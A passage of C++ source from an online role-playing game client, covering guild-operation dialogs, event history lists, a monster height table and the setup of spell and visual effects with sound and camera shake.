	m_Misc.ReplaceString(m_cGuildName, '_', ' ');
	ip   = (int *)cp;
	m_iGuildRank = *ip;
	cp += 4;
	m_iSuperAttackLeft = (int)*cp;
	cp++;
	ip   = (int *)cp;
	m_iFightzoneNumber = *ip;
	cp += 4;
}


void CGame::DisbandGuildResponseHandler(char * pData)
{WORD * wpResult;
 	wpResult = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	switch (*wpResult) {
	case DEF_MSGTYPE_CONFIRM:
		ZeroMemory(m_cGuildName, sizeof(m_cGuildName));
		m_iGuildRank = -1;
		m_stDialogBoxInfo[7].cMode = 7;
		break;
	case DEF_MSGTYPE_REJECT:
		m_stDialogBoxInfo[7].cMode = 8;
		break;
	}
}

void CGame::NotifyMsg_BanGuildMan(char * pData)
{ char * cp, cName[24], cLocation[12];
	ZeroMemory(cName, sizeof(cName));
	ZeroMemory(cLocation, sizeof(cLocation));
	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
	memcpy(cName, cp, 20);
	cp += 20;
	cp += 2;
	memcpy(cLocation, cp, 10);
	cp += 10;
	ZeroMemory(m_cGuildName, sizeof(m_cGuildName));
	m_iGuildRank = -1;
	ZeroMemory(m_cLocation, sizeof(m_cLocation));
	memcpy(m_cLocation, cLocation, 10);
	if (memcmp(m_cLocation, "aresden", 7) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "arehunter", 9) == 0)
	{	m_bAresden = TRUE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else if (memcmp(m_cLocation, "elvine", 6) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = FALSE;
	}else if (memcmp(m_cLocation, "elvhunter", 9) == 0)
	{	m_bAresden = FALSE;
		m_bCitizen = TRUE;
		m_bHunter  = TRUE;
	}else
	{	m_bAresden = TRUE;
		m_bCitizen = FALSE;
		m_bHunter  = TRUE;
	}
	EnableDialogBox(8, NULL, NULL, NULL);
	_PutGuildOperationList(cName, 8);
}

void CGame::_PutGuildOperationList(char * pName, char cOpMode)
{int i;
	for (i = 0; i < 100; i++)
	if (m_stGuildOpList[i].cOpMode == NULL)
	{	m_stGuildOpList[i].cOpMode = cOpMode;
		ZeroMemory(m_stGuildOpList[i].cName, sizeof(m_stGuildOpList[i].cName));
		memcpy(m_stGuildOpList[i].cName, pName, 20);
		return;
	}
}

void CGame::_ShiftGuildOperationList()
{int i;
	ZeroMemory(m_stGuildOpList[0].cName ,sizeof(m_stGuildOpList[0].cName));
	m_stGuildOpList[0].cOpMode = NULL;

	for (i = 1; i < 100; i++)
	if ((m_stGuildOpList[i-1].cOpMode == NULL) && (m_stGuildOpList[i].cOpMode != NULL)) {
		m_stGuildOpList[i-1].cOpMode = m_stGuildOpList[i].cOpMode;
		ZeroMemory(m_stGuildOpList[i-1].cName, sizeof(m_stGuildOpList[i-1].cName));
		memcpy(m_stGuildOpList[i-1].cName, m_stGuildOpList[i].cName, 20);

		ZeroMemory(m_stGuildOpList[i].cName ,sizeof(m_stGuildOpList[i].cName));
		m_stGuildOpList[i].cOpMode = NULL;
	}
}



void CGame::DlgBoxClick_GuildOp(short msX, short msY)
{
 short sX, sY;
 char cName[12], cName20[24];

	ZeroMemory(cName, sizeof(cName));
	ZeroMemory(cName20, sizeof(cName20));
	sX = m_stDialogBoxInfo[8].sX;
	sY = m_stDialogBoxInfo[8].sY;

	switch (m_stGuildOpList[0].cOpMode) {
	case 3:
	case 4:
	case 5:
	case 6:
	case 7:
		if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY > sY + DEF_BTNPOSY) && (msY < sY + DEF_BTNPOSY + DEF_BTNSZY)) {
			_ShiftGuildOperationList();
			if (m_stGuildOpList[0].cOpMode == NULL) DisableDialogBox(8);
		}
		return;
	}

	if ((msX >= sX + DEF_LBTNPOSX) && (msX <= sX + DEF_LBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		// Approve
		PlaySound('E', 14, 5);

		switch (m_stGuildOpList[0].cOpMode) {
		case 1:
			strcpy(cName20, m_stGuildOpList[0].cName);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_JOINGUILDAPPROVE, NULL, NULL, NULL, NULL, cName20);
			break;

		case 2:
			strcpy(cName20, m_stGuildOpList[0].cName);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_DISMISSGUILDAPPROVE, NULL, NULL, NULL, NULL, cName20);
			break;
		}
		_ShiftGuildOperationList();
		if (m_stGuildOpList[0].cOpMode == NULL) DisableDialogBox(8);
	}

	if ((msX >= sX + DEF_RBTNPOSX) && (msX <= sX + DEF_RBTNPOSX + DEF_BTNSZX) && (msY >= sY + DEF_BTNPOSY) && (msY <= sY + DEF_BTNPOSY + DEF_BTNSZY)) {
		// Reject
		PlaySound('E', 14, 5);

		switch (m_stGuildOpList[0].cOpMode) {
		case 1:
			strcpy(cName20, m_stGuildOpList[0].cName);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_JOINGUILDREJECT, NULL, NULL, NULL, NULL, cName20);
			break;

		case 2:
			strcpy(cName20, m_stGuildOpList[0].cName);
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_DISMISSGUILDREJECT, NULL, NULL, NULL, NULL, cName20);
			break;
		}

		_ShiftGuildOperationList();
		if (m_stGuildOpList[0].cOpMode == NULL) DisableDialogBox(8);
	}
}

void CGame::SetItemCount(char * pItemName, DWORD dwCount)
{int i;
 char cTmpName[21];
	ZeroMemory(cTmpName, sizeof(cTmpName));
	strcpy(cTmpName, pItemName);
	for (i = 0; i < DEF_MAXITEMS; i++)
	if ((m_pItemList[i] != NULL) && (memcmp(m_pItemList[i]->m_cName, cTmpName, 20) == 0))
	{	m_pItemList[i]->m_dwCount = dwCount;
		return;
	}
}


void CGame::AddEventList(char * pTxt, char cColor, BOOL bDupAllow)
{int i;
	if ((bDupAllow == FALSE) && (strcmp(m_stEventHistory[5].cTxt, pTxt) == 0)) return;
	if (cColor == 10)
	{	for (i = 1; i < 6; i++)
		{	strcpy(m_stEventHistory2[i-1].cTxt, m_stEventHistory2[i].cTxt);
			m_stEventHistory2[i-1].cColor = m_stEventHistory2[i].cColor;
			m_stEventHistory2[i-1].dwTime = m_stEventHistory2[i].dwTime;
		}
		ZeroMemory(m_stEventHistory2[5].cTxt, sizeof(m_stEventHistory2[5].cTxt));
		strcpy(m_stEventHistory2[5].cTxt, pTxt);
		m_stEventHistory2[5].cColor = cColor;
		m_stEventHistory2[5].dwTime = m_dwCurTime;
	}else
	{	for (i = 1; i < 6; i++)
		{	strcpy(m_stEventHistory[i-1].cTxt, m_stEventHistory[i].cTxt);
			m_stEventHistory[i-1].cColor = m_stEventHistory[i].cColor;
			m_stEventHistory[i-1].dwTime = m_stEventHistory[i].dwTime;
		}
		ZeroMemory(m_stEventHistory[5].cTxt, sizeof(m_stEventHistory[5].cTxt));
		strcpy(m_stEventHistory[5].cTxt, pTxt);
		m_stEventHistory[5].cColor = cColor;
		m_stEventHistory[5].dwTime = m_dwCurTime;
	}
}

void CGame::AddEnergyList(char * pTxt, char cColor)
{int i;
	if (cColor == 1 || cColor == 2 || cColor == 3)
	{	for (i = 1; i < 6; i++)
		{	strcpy(m_stEventHistory2[i-1].cTxt, m_stEventHistory2[i].cTxt);
			m_stEventHistory2[i-1].cColor = m_stEventHistory2[i].cColor;
			m_stEventHistory2[i-1].dwTime = m_stEventHistory2[i].dwTime;
		}
		ZeroMemory(m_stEventHistory2[5].cTxt, sizeof(m_stEventHistory2[5].cTxt));
		strcpy(m_stEventHistory2[5].cTxt, pTxt);
		m_stEventHistory2[5].cColor = cColor;
		m_stEventHistory2[5].dwTime = m_dwCurTime;
	}
}

int _iAttackerHeight[] = {0, 35, 35,35,35,35,35, 0,0,0,
5,  // Slime
35, // Skeleton
40, // Stone-Golem
45, // Cyclops
35,// OrcMage
35,// ShopKeeper
5, // GiantAnt
8, // Scorpion
35,// Zombie
35,// Gandalf
35,// Howard
35,// Guard
10,// Amphis
38,// Clay-Golem
35,// Tom
35,// William
35,// Kennedy
35,// Hellhound
50,// Troll
45,// Orge
55,// Liche
65,// Demon
46,// Unicorn
49,// WereWolf
55,// Dummy
35,// Energysphere
75,// Arrow Guard Tower
75,// Cannon Guard Tower
50,// Mana Collector
50,// Detector
50,// Energy Shield Generator
50,// Grand Magic Generator
50,// ManaStone 42
40,// Light War Beetle
35,// GHK
40,// GHKABS
35,// TK
60,// BG
40,// Stalker
70,// HellClaw
85,// Tigerworm
50,// Catapult
85,// Gargoyle
70,// Beholder
40,// Dark-Elf
20,// Bunny
20,// Cat
40,// Giant-Frog
80,// Mountain-Giant
85,// Ettin
50,// Cannibal-Plant
50, // Rudolph 61 //Snoopy....
80, // Direboar 62
90, // Frost 63
40, // Crops 64
80, // IceGolem 65
190, // Wyvern 66
35, // npc 67
35, // npc 68
35, // npc 69
100, // Dragon 70
90, // Centaur 71
75, // ClawTurtle 72
200, // FireWyvern 73
80, // GiantCrayfish 74
120, // Gi Lizard 75
100, // Gi Tree 76
100, // Master Orc 77
80, // Minaus 78
100, // Nizie 79
25,  // Tentocle 80
200, // Abaddon	 81
60, // Sorceress 82
60, // ATK 83
70, // MasterElf 84
60, // DSK 85
50, // HBT 86
60, // CT 87
60, // Barbarian 88
60, // AGC 89
35, // ncp 90 Gail
35  // Gate 91
};

void CGame::bAddNewEffect(short sType, int sX, int sY, int dX, int dY, char cStartFrame, int iV1)
{int i;
 short sAbsX, sAbsY, sDist;
 long lPan;
 int  iV2 = 0;
	if (m_cDetailLevel == 0) // Detail Level Low
	{	switch (sType) {
		case 8:
		case 9:
		case 11:
		case 12:
		case 14:
		case 15:
			return;
	}	}
	if( m_bIsProgramActive == FALSE ) return;
#ifdef RES_HIGH
	sAbsX = abs(((m_sViewPointX / 32) + 12) - dX);
	sAbsY = abs(((m_sViewPointY / 32) + 9) - dY);
#else
  	sAbsX = abs(((m_sViewPointX / 32) + 10) - dX);
	sAbsY = abs(((m_sViewPointY / 32) + 7) - dY);
#endif
	if (sAbsX > sAbsY) sDist = sAbsX;
	else sDist = sAbsY;

	for (i = 0; i < DEF_MAXEFFECTS; i++)
	if (m_pEffectList[i] == NULL)
	{	m_pEffectList[i] = new class CEffect;
		m_pEffectList[i]->m_sType  = sType;
		m_pEffectList[i]->m_sX     = sX;
		m_pEffectList[i]->m_sY     = sY;
		m_pEffectList[i]->m_dX     = dX;
		m_pEffectList[i]->m_dY     = dY;
		m_pEffectList[i]->m_iV1    = iV1;
		m_pEffectList[i]->m_cFrame = cStartFrame;
		m_pEffectList[i]->m_dwTime = m_dwCurTime;

		switch (sType) {
		case 1: // coup normal
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - _iAttackerHeight[iV1];
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 2:	// Flche qui vole
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - _iAttackerHeight[iV1];
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 0;
			m_pEffectList[i]->m_dwFrameTime = 10;
			m_pEffectList[i]->m_cDir = m_Misc.cCalcDirection(sX, sY, dX, dY);
			PlaySound('C', 4, sDist);
			break;

		case 4: // Gold
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32;
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 100;
#ifdef RES_HIGH
			sAbsX = abs(((m_sViewPointX / 32) + 12) - sX);
			sAbsY = abs(((m_sViewPointY / 32) + 9) - sY);
#else
			sAbsX = abs(((m_sViewPointX / 32) + 10) - sX);
			sAbsY = abs(((m_sViewPointY / 32) + 7)  - sY);
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000; // centu - 800x600
			PlaySound('E', 12, sDist, lPan);
			break;

		case 5: // FireBall Fire Explosion
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 11;
			m_pEffectList[i]->m_dwFrameTime = 10;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000; // centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist);
			break;

		case 6:	 // Energy Bolt
		case 10: // Lightning Arrow
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 10;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 2, sDist, lPan);
			SetCameraShakingEffect(sDist);
			break;

		case 7: // Magic Missile Explosion
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 5;
			m_pEffectList[i]->m_dwFrameTime = 50;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 3, sDist, lPan);
			break;

		case 8: // Burst
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 4;
			m_pEffectList[i]->m_dwFrameTime = 30;
			break;

		case 9: // Burst
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_rX     =  6 - (rand() % 12);
			m_pEffectList[i]->m_rY     = -8 - (rand() % 6);
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 30;
			break;

		case 11:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_rX     =  6 - (rand() % 12);
			if (iV2 == 0)
				 m_pEffectList[i]->m_rY     = -2 - (rand() % 4);
			else m_pEffectList[i]->m_rY     = -2 - (rand() % 10);
			m_pEffectList[i]->m_cMaxFrame   = 8;
			m_pEffectList[i]->m_dwFrameTime = 30;
			break;

		case 12: // Burst
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_rX    =  8 - (rand() % 16);
			m_pEffectList[i]->m_rY    =  4 - (rand() % 12);
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 30;
			break;

		case 13: // Bulles druncncity
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 18;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 14: // Traces de pas ou Tremor (pas en low detail)
			m_pEffectList[i]->m_mX    = sX;
			if (m_pEffectList[i]->m_iV1 > 0) // Case if hit by an arrow
			{	m_pEffectList[i]->m_mY = sY - (_iAttackerHeight[m_pEffectList[i]->m_iV1]/4 + rand()%(_iAttackerHeight[m_pEffectList[i]->m_iV1]/2) );
				m_pEffectList[i]->m_mX = sX + (rand()%5) -2;
			}else m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 4;
			m_pEffectList[i]->m_dwFrameTime = 100;
			m_pEffectList[i]->m_iV1 = iV1;
			break;

		case 15: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 16: //
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 17:
			m_pEffectList[i]->m_mX     = sX + (rand() % 20) - 40;
			m_pEffectList[i]->m_mY     = sY + (rand() % 20) - 40;
			m_pEffectList[i]->m_rX     =  8 - (rand() % 16);
			m_pEffectList[i]->m_rY     =  4 - (rand() % 12);
			m_pEffectList[i]->m_mX3    = sX;
			m_pEffectList[i]->m_mY3    = sY;
			m_pEffectList[i]->m_iV1    = 0;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 18:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 50;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;

		case 20:
		case 21:
		case 22:
		case 23:
		case 24:
		case 25:
		case 26:
		case 27: // Critical strike with a weapon
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 0;
			m_pEffectList[i]->m_dwFrameTime = 10;
			m_pEffectList[i]->m_cDir = m_Misc.cCalcDirection(sX, sY, dX, dY);
			break;

		case 30: // Mass-Fire-Strike (called 1 time)
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 9;
			m_pEffectList[i]->m_dwFrameTime = 40;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist*2);
			break;

		case 31: // Mass-Fire-Strike (called 3 times)
		case 252: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 8;
			m_pEffectList[i]->m_dwFrameTime = 40;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist);
			break;

		case 197: // Fury-Of-Thor
			m_pEffectList[i]->m_rX = 5 - (rand() % 10);
			m_pEffectList[i]->m_rY = 5 - (rand() % 10);
			m_pEffectList[i]->m_mX = sX * 32;
			m_pEffectList[i]->m_mY = sY * 32;
			m_pEffectList[i]->m_iErr = 0;
			m_pEffectList[i]->m_cMaxFrame = 35;
			m_pEffectList[i]->m_dwFrameTime = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;

		//HellFire Rain
		case 85:
		case 86:
		case 87:
			m_pEffectList[i]->m_mX = sX;
			m_pEffectList[i]->m_mY = sY;
			m_pEffectList[i]->m_cMaxFrame = 14;
			m_pEffectList[i]->m_dwFrameTime = 35;
			lPan = -(((m_sViewPointX / 32) + 12) - dX) * 1000; // centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist + 1, 2);
			break;
		case 193: //HELLFIRE!
			m_pEffectList[i]->m_cMaxFrame = 30;
			m_pEffectList[i]->m_dwFrameTime = 35;
			break;

		case 32: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 4;
			m_pEffectList[i]->m_dwFrameTime = 100;
			break;

		case 33: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 34: //
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;

		case 35: // Snoopy: rajout (pour Mass Magic-Missile)
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 18;
			m_pEffectList[i]->m_dwFrameTime = 40;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist*2);
			break;

		case 36: // Snoopy: Rajout (pour Mass Magic-Missile)
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 40;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(400 - (sX - m_sViewPointX)) * 1000;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(320 - (sX - m_sViewPointX))*1000;
#endif
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist);
			break;

		case 40: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 45, sDist, lPan);
			break;

		case 41: // Large Type 1, 2, 3, 4
		case 42:
		case 43:
		case 44:
		case 45: // Small Type 1, 2
		case 46:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY -220;
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_iV1 = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 46, sDist, lPan);
			break;

		case 47: // Blizzard
		case 48: // Blizzard
		case 49: // Blizzard
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY -220;
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_iV1 = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 46, sDist, lPan);
			break;

		case 50: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 50;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			if ((rand()%4) == 1) SetCameraShakingEffect(sDist);
			PlaySound('E', 47, sDist, lPan);
			break;

		case 51:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 9; //15;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 52: // Protect ring
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 80;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
